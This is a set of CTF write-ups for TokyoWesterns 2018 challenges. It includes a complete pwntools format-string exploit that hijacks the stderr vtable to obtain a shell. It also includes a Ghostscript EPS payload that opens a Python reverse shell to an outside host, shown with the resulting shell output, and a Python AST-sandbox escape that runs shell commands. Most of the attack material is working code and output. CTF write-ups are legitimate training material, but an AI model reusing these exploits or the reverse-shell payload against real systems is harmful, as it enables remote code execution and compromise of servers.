from pwn import * import os context(os='linux', arch='amd64', log_level='debug') DEBUG = 0 libc = ELF('libc.so.6') if DEBUG: #p = process('./neighbor_c', env={'LD_PRELOAD': os.getcwd() + '/libc.so.6'}) #p = remote('localhost', 12121) pass else: #p = remote('neighbor.chal.ctf.westerns.tokyo', 37565) pass def main(p, base, halfbyte): if DEBUG: raw_input() p.recvuntil('mayor.') p.sendline('dtj') if DEBUG: base = int(raw_input('base number'), 16) value = base + 0x18 p.sendline('%{}c%9$hhn'.format(value)); if DEBUG: half_byte = int('0x{}600'.format(raw_input('stdout half byte number').strip()), 16) else: half_byte = int('0x{}600'.format(halfbyte), 16) p.sendline('%{}c%11$hn'.format(half_byte)) p.sendline('anciety%lx %lx %lx %lx %lx %lx %lx') if DEBUG: p.recvuntil('anciety') else: p.recvuntil('anciety', timeout=4) #p.recvuntil('anciety', timeout=3) line = p.recvline().strip().split() p.info(line) libc_base = int(line[4], 16) - (0x7f1b5b0a6520 - 0x00007f1b5ace4000) p.info('get libc base %lx' % libc_base) stderr_struct = libc_base + libc.symbols['_IO_2_1_stderr_'] #stderr_struct = libc_base + (0x7ffc9f055e00 - 0x00007f31f5233000) stderr_vtable = stderr_struct + 0xe0 - 8 wstr_jump_table = libc_base + libc.symbols['_IO_wfile_jumps'] - 0x248 # modify things back p.sendline('%{}c%9$hhn'.format(base + 0x18)) stderr_last_two = u16(p64(libc_base + libc.symbols['_IO_2_1_stderr_'])[:2]) p.sendline('%{}c%11$hn'.format(stderr_last_two)) # change fp+0xe0 to one_gadget malloc_hook = libc_base + libc.symbols['__malloc_hook'] newip_at = malloc_hook one_gadget = libc_base + 0xf24cb new_ip_packed = p64(newip_at) # points to libc value p.sendline('%{}c%9$hhn'.format(base)) p.sendline('%{}c%11$hn'.format(u16(p64(newip_at)[:2]))) ''' # modify libc value to fp+0xe0 x = 0 for i in new_ip_packed[:4]: x += 1 p.sendline('%{}c%11$hhn'.format(ord(i))) # points to next value to modify p.sendline('%{}c%9$hhn'.format(base + x)) ''' # modify fp+0xe0+8 to one_gadget now p.info('modify %x to %x' % (newip_at, one_gadget)) x = 0 for i in p64(one_gadget)[:6]: x += 1 p.sendline('%{}c%5$hhn'.format(ord(i))) p.sendline('%{}c%11$hhn'.format(ord(new_ip_packed[0]) + x)) # points to libc value p.sendline('%{}c%9$hhn'.format(base)) p.info('modify %x to %x' % (stderr_vtable, wstr_jump_table)) # modify libc value to stderr's vtable x = 0 stderr_vtable_packed = p64(stderr_vtable) for i in stderr_vtable_packed[:6]: x += 1 p.sendline('%{}c%11$hhn'.format(ord(i))) p.sendline('%{}c%9$hhn'.format(base + x)) x = 0 if False: p.sendline('break me') p.recvuntil('break me') raw_input('break me') p.sendline('%{}c%9$hhn'.format(base)) p.sendline('%{}c%5$hn'.format(u16(p64(wstr_jump_table)[:2]))) p.sendline('%40000c') p.recv() p.sendline('echo wtf') try: p.recvuntil('wtf', timeout=3) except: return False p.sendline('ls') p.recv() p.sendline('cat flag') p.interactive() return True def bruteforce(): if DEBUG: p = remote('localhost', 12121) main(p, '10', 'a') return while True: try: with remote('neighbor.chal.ctf.westerns.tokyo', 37565) as p: #with remote('localhost', 12121) as p: if main(p, 0x10, 'a'): return except KeyboardInterrupt as e: raise e except: pass if __name__ == '__main__': bruteforce()
welcome |Misc
dec dec dec | reverse
mondai.zip | misc
First password: y0k0s0 (filename is y0k0s0.zip)
Second password: We1come (bytearray of char( echo request size))
Third password: eVjbtTpvkU ([i for i in file(“list.txt”).read().split(‘n’)] and bruteforce)
Forth password: happyhappyhappy (1c9ed78bab3f2d33140cbce7ea223894 md5 hash crack)
Fifth password: to (bruteforce zip file)
vimshell | misc
chrome -app= https://vimshell.chal.ctf.westerns.tokyo
Ctrl + W -> :! cat /flag
slack emoji converter | web
We can get the sourcecode just by looking at the sourcecode of the index page.
<!– <a href=”/source”>source</a> –> shows the following data :-
from flask import ( Flask, render_template, request, redirect, url_for, make_response, ) from PIL import Image import tempfile import os app = Flask(__name__) @app.route('/') def index(): return render_template('index.html') @app.route('/source') def source(): return open(__file__).read() @app.route('/conv', methods=['POST']) def conv(): f = request.files.get('image', None) if not f: return redirect(url_for('index')) ext = f.filename.split('.')[-1] fname = tempfile.mktemp("emoji") fname = "{}.{}".format(fname, ext) f.save(fname) img = Image.open(fname) w, h = img.size r = 128/max(w, h) newimg = img.resize((int(w*r), int(h*r))) newimg.save(fname) response = make_response() response.data = open(fname, "rb").read() response.headers['Content-Disposition'] = 'attachment; filename=emoji_{}'.format(f.filename) os.unlink(fname) return response if __name__ == '__main__': app.run(host="", port=8080, debug=True)
Well, as you noticed, the code itself is not vulnerable. But if you ever noticed, it uses the PIL library which has been known to have RCEs by maliciously crafting image ( CVE-2017-8291 ).
However, this CVE-2017-8291 is outdated. This CTF is running in September 2018. Many of people should’ve been stuck here.
I’ve been searching on google and found this interesting issue request that was written in seclists.org last month.
But Just copy and pasting the PoC does not give you the flag. You need to craft it a little further and make it suitable for the challenge server to recognize the file.
(But seriously, this challenge is a 1day exploit challenge and this 1day is not assigned by CVE yet. How awesome is that?)
In my case, I used the following ghostscript file and uploaded it onto the server.
%!PS-Adobe-3.0 EPSF-3.0 %%BoundingBox: 0 0 30 30 userdict /setpagedevice undef save legal { null restore } stopped { pop } if { legal } stopped { pop } if restore mark /OutputFile (%pipe%python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("harold.kim",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);') currentdevice putdeviceprops
The result? well…
root@imouto-router:/# nc -vlp 8080 Listening on [] (family 0, port 8080) Connection from 53674 received! /bin/sh: 0: can't access tty; job control turned off $ cat /flag TWCTF{watch_0ut_gh0stscr1pt_everywhere}$ id uid=1000(emoji) gid=1000(emoji) groups=1000(emoji) $ exit root@imouto-router:/#
py sandbox | misc
The objective of this challenge is nothing but to bypass the ast filters and execute the flag.
In this challenge, I used the following payload to solve both challenges.
pysandbox1: [1,2,3,4][1:__import__("os").system("cat flag")] pysandbox2: [1,2,3,4][1:__import__("os").system("cat flag2")]
How it works?
First we need to look at what kind of attributes are checked within the check() function.
'BoolOp': ['values'], 'BinOp': ['left', 'right'], 'UnaryOp': ['operand'], 'Lambda': ['body'], 'IfExp': ['test', 'body', 'orelse'], 'Dict': ['keys', 'values'], 'Set': ['elts'], 'ListComp': ['elt', 'generators'], 'SetComp': ['elt', 'generators'], 'DictComp': ['key', 'value', 'generators'], 'GeneratorExp': ['elt', 'generators'], 'Yield': ['value'], 'Compare': ['left', 'comparators'], 'Call': False, # call is not permitted 'Repr': ['value'], 'Num': True, 'Str': True, 'Attribute': False, # attribute is also not permitted 'Subscript': ['value'], 'Name': True, 'List': ['elts'], 'Tuple': ['elts'], 'Expr': ['value'], # root node 'comprehension': ['target', 'iter', 'ifs'],
And this check() is run recursively so you can’t even use any of above ast types.
My approach was to analyze the ast attributes from the input by dumping the parsed variables ast.dump(ast.parse(stdin))`
So I modified a bit of the challenge script to start debugging..
root@stypr-200109:~# python x.py [1,2,3] Module(body=[Expr(value=List(elts=[Num(n=1), Num(n=2), Num(n=3)], ctx=Load()))])
Above code obviously works because it meets the criteria.
root@stypr-200109:~# python x.py [1,2,3,4][1:__import__('os').system('ls')] Module(body=[Expr(value=Subscript(value=List(elts=[Num(n=1), Num(n=2), Num(n=3), Num(n=4)], ctx=Load()), slice=Slice(lower=Num(n=1), upper=Call(func=Attribute(value=Call(func=Name(id='__import__', ctx=Load()), args=[Str(s='os')], keywords=[], starargs=None, kwargs=None), attr='system', ctx=Load()), args=[Str(s='ls')], keywords=[], starargs=None, kwargs=None), step=None), ctx=Load()))]) <class '_ast.Expr'> <class '_ast.Subscript'> <class '_ast.List'> <class '_ast.Num'> <class '_ast.Num'> <class '_ast.Num'> <class '_ast.Num'> x.py flag
Well, as you’ve seen, Slice is not included in the attribute check. So this literally bypasses the check() function.
exploiting this slice gives the flag :-
root@stypr-200109:~# echo -e '[1,2,3,4][1:__import__("os").system("cat flag")]' | nc -v4 pwn1.chal.ctf.westerns.tokyo 30001 Connection to pwn1.chal.ctf.westerns.tokyo 30001 port [tcp/*] succeeded! TWCTF{go_to_next_challenge_running_on_port_30002} []root@stypr-200109:~# cat a.txt | nc -v4 pwn1.chal.ctf.westerns.tokyo 30002 | tail -3 Connection to pwn1.chal.ctf.westerns.tokyo 30002 port [tcp/*] succeeded! sys.stdout.flush() TWCTF{baby_sandb0x_escape_with_pythons} []root@stypr-200109:~#
BBQ old | pwn
与BBQ 相同。
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